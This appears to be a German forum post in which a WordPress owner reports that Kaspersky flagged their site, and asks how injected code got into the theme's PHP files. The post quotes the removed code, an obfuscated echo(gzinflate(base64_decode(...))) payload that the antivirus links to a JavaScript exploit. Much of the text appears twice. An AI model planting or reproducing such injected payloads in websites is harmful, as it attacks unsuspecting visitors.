Hallo!
Ich habe seit wenigen Tagen Webspace, auf dem ich nun Wordpress für meine Seite installiert habe.
Nach kurzer Zeit wurde ich von einigen Usern mit Kaspersky darauf aufmerksam gemacht, dass sie meine Seite nicht besuchen können, weil der Zugriff verboten wurde, weil eine Bedrohung gefunden wurde. Dabei wurde auf "Exploit.JS.Agent.bil" hingewiesen. Leider hat mir Google darüber nicht sonderlich viel ausgespuckt.
Nach langem rumgeteste, wo das herkommen könnte bin ich in mehreren .php files in dem Ordner, in dem Wordpress mein Theme "monochrome" hat, auf einen mir unbekannten Code gestoßen. Dieser war unter anderem in der footer.php, der header.php und index.php. Ich habe mir dann die Mühe gemacht, den Code aus jeder einzelnen Datei von Hand zu löschen und nun funktioniert meine Seite wieder ohne Fehlermeldung.
Der Code sah wie folgt aus (ich hoffe, das ist nicht schon problematisch wenn ich den hier poste, aber dürfte ja eigentlich nicht):
Meine hauptsächliche Sorge liegt nun bei der Frage:
Wie kam der Code in die ganzen Files rein? Ich hab Wordpress erst vor ein paar Tagen neu installiert mit einem frischen Download von der Wordpress Seite.
Außerdem stellt sich mir die Frage kann das nochmal wieder kommen und generell, ist dieser Code gefährlich? Ich hab halt leider gar keine Ahnung wo das überhaupt hergekommen sein kann und was er überhaupt gemacht hat. Auch Kaspersky hat lediglich einen Fund auf der Seite gemeldet, nicht aber wo genau und was das Ding macht.
Jemand Ideen oder Anregungen was wohl das sinnvollste in diesem Fall wäre?
Bin leicht ratlos und hoffe auf eure Hilfe.
Ich habe seit wenigen Tagen Webspace, auf dem ich nun Wordpress für meine Seite installiert habe.
Nach kurzer Zeit wurde ich von einigen Usern mit Kaspersky darauf aufmerksam gemacht, dass sie meine Seite nicht besuchen können, weil der Zugriff verboten wurde, weil eine Bedrohung gefunden wurde. Dabei wurde auf "Exploit.JS.Agent.bil" hingewiesen. Leider hat mir Google darüber nicht sonderlich viel ausgespuckt.
Nach langem rumgeteste, wo das herkommen könnte bin ich in mehreren .php files in dem Ordner, in dem Wordpress mein Theme "monochrome" hat, auf einen mir unbekannten Code gestoßen. Dieser war unter anderem in der footer.php, der header.php und index.php. Ich habe mir dann die Mühe gemacht, den Code aus jeder einzelnen Datei von Hand zu löschen und nun funktioniert meine Seite wieder ohne Fehlermeldung.
Der Code sah wie folgt aus (ich hoffe, das ist nicht schon problematisch wenn ich den hier poste, aber dürfte ja eigentlich nicht):
#7819f9#
echo(gzinflate(base64_decode("1VdNj5swEP0rKy6AaFIbsAE57qU9t4dWvUQ5oOBskDYQAbtt/33xGLAhZPOxVaU9ZITtmfGb8cxzvKq3VX5sPn1vqrx4XB6rsimbP0exbETdcGtvsV1ZOflDXti2m++cnHNbLtnugdv2Ot+wl7R6qGtuWSxNeVZunw+iaJbbSqSN+CF+N1/LTDgHz0otz6o+t6IdWy6rudpybe0qOXlol9J0bRdlZnu2+Jm28ulZ2JsNy3ghfj18af05Lst8PcqWL2mr823nuAvfZXue+YuMFXwdLfYf5A+jACRqZQAibkUSw2QiP0ELE5iQ30kCn6CBw1aGIUzgYQ1mqfJOtcWsMcZyf6o+5WLsSzUyuIyoHg8eAGQAQ6qRxoMTWArAnRQh+MD9HPZxF/1cFjD2Z3ZUs2pfOSYjcz/o09cFSIfQFF40u+0dacbRAKYDDYtGVuQSia8KSsHCgVaQS2TIIEa+cVBKShMiwwtJL5RbhV1pQUhhoJOgvYEyBA4QICpjSMaJO4mRIF1xBjiISZ060mkC48QoNjDR8YVRXxyGqUJpbA5laO52wQEOjHQl4y4wcoupEV+g4RrTiE5SoPwRqgHpEHUSVdWQaDgvdR7mLn0+Ar2qjIZuS6hhYhY1mRzISZ8jnSjap6cDExpg0KkCJIaivoBVMVysYjCAsj/XmbrNkdFlsW67+WR09XArNczQC9YkppTRmHTJ0I23U0KiGQEUkskBXUnEmlKv4I1olGylGoaT1lXXQHDCIP6k1qcVZSCZUpNqOv9d89P5tJ3hjE7jfrqY8vl5zgCte8DdyDIDopuo5l50Z8hJszh9S+gnnHa133/XJq/cdpOWmd5Y/6GJL1+o12J843+n9/EXVTEO0W2F0RgVOKFk0s9dHHG/dXe7zN+IG/Vm4Yjlq2L5JIrHZs9yz3Pr2uO1U7SvFpeJ9ung1LXLVh+7J9Bf")));
#/7819f9#
echo(gzinflate(base64_decode("1VdNj5swEP0rKy6AaFIbsAE57qU9t4dWvUQ5oOBskDYQAbtt/33xGLAhZPOxVaU9ZITtmfGb8cxzvKq3VX5sPn1vqrx4XB6rsimbP0exbETdcGtvsV1ZOflDXti2m++cnHNbLtnugdv2Ot+wl7R6qGtuWSxNeVZunw+iaJbbSqSN+CF+N1/LTDgHz0otz6o+t6IdWy6rudpybe0qOXlol9J0bRdlZnu2+Jm28ulZ2JsNy3ghfj18af05Lst8PcqWL2mr823nuAvfZXue+YuMFXwdLfYf5A+jACRqZQAibkUSw2QiP0ELE5iQ30kCn6CBw1aGIUzgYQ1mqfJOtcWsMcZyf6o+5WLsSzUyuIyoHg8eAGQAQ6qRxoMTWArAnRQh+MD9HPZxF/1cFjD2Z3ZUs2pfOSYjcz/o09cFSIfQFF40u+0dacbRAKYDDYtGVuQSia8KSsHCgVaQS2TIIEa+cVBKShMiwwtJL5RbhV1pQUhhoJOgvYEyBA4QICpjSMaJO4mRIF1xBjiISZ060mkC48QoNjDR8YVRXxyGqUJpbA5laO52wQEOjHQl4y4wcoupEV+g4RrTiE5SoPwRqgHpEHUSVdWQaDgvdR7mLn0+Ar2qjIZuS6hhYhY1mRzISZ8jnSjap6cDExpg0KkCJIaivoBVMVysYjCAsj/XmbrNkdFlsW67+WR09XArNczQC9YkppTRmHTJ0I23U0KiGQEUkskBXUnEmlKv4I1olGylGoaT1lXXQHDCIP6k1qcVZSCZUpNqOv9d89P5tJ3hjE7jfrqY8vl5zgCte8DdyDIDopuo5l50Z8hJszh9S+gnnHa133/XJq/cdpOWmd5Y/6GJL1+o12J843+n9/EXVTEO0W2F0RgVOKFk0s9dHHG/dXe7zN+IG/Vm4Yjlq2L5JIrHZs9yz3Pr2uO1U7SvFpeJ9ung1LXLVh+7J9Bf")));
#/7819f9#
Meine hauptsächliche Sorge liegt nun bei der Frage:
Wie kam der Code in die ganzen Files rein? Ich hab Wordpress erst vor ein paar Tagen neu installiert mit einem frischen Download von der Wordpress Seite.
Außerdem stellt sich mir die Frage kann das nochmal wieder kommen und generell, ist dieser Code gefährlich? Ich hab halt leider gar keine Ahnung wo das überhaupt hergekommen sein kann und was er überhaupt gemacht hat. Auch Kaspersky hat lediglich einen Fund auf der Seite gemeldet, nicht aber wo genau und was das Ding macht.
Jemand Ideen oder Anregungen was wohl das sinnvollste in diesem Fall wäre?
Bin leicht ratlos und hoffe auf eure Hilfe.